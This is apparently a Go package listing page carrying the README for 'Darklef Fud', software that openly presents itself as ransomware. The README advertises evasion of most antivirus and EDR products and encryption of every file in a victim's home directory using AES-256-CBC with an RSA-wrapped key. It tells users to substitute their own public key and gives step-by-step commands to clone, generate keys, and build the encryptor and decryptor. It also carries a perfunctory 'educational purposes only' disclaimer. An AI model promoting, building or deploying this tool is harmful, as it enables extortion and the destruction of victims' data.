darkleffud

command module
v0.0.0-...-d4d51fe Latest Latest
Warning

This package is not in the latest version of its module.

Go to latest
Published: Oct 3, 2024 License: MIT Imports: 16 Imported by: 0

README

Darklef Fud By Cyber Warrior

A fast cross-platform ransomware

Description:

Ransomware is a type of malicious software (malware) that cybercriminals use to block access to a victim's computer system or encrypt their files, demanding a ransom for the decryption key. Once the ransomware is installed, it typically restricts access by either locking the system or encrypting files, making them unusable. Victims are then notified that they must pay a ransom, often in cryptocurrency, to regain access to their data.

Warning:

This tool is made for educational purposes only. The developer is not responsible for any misuse or unintended consequences arising from the use of this tool.

Features:

  • Undetectable by most AV/EDR solutions

  • Written in Go

  • Encrypts all files in user's home directory

  • Very fast encryption speed

Technical details:

  • AES-256-CBC for encrypting files
  • RSA for encrypting AES-256 key

Tip: Replace hardcoded RSA public key in code with your own

Installation:

$ sudo apt update
$ sudo apt install openssl
$ git clone https://github.com/Darkl3f/darkleffud.git
$ cd darkleffud/
$ openssl genpkey -algorithm RSA -out private_key.pem -pkeyopt rsa_keygen_bits:2048
$ openssl rsa -pubout -in private_key.pem -out public_key.pem
$ go build darkleffud.go
$ go build decryptor.go
Results(no code obfuscation):

screenshot

License

Distributed under the MIT License. See LICENSE for more information.

Documentation

The Go Gopher

There is no documentation for this package.

Jump to

Keyboard shortcuts

? : This menu
/ : Search site
f or F : Jump to
y or Y : Canonical URL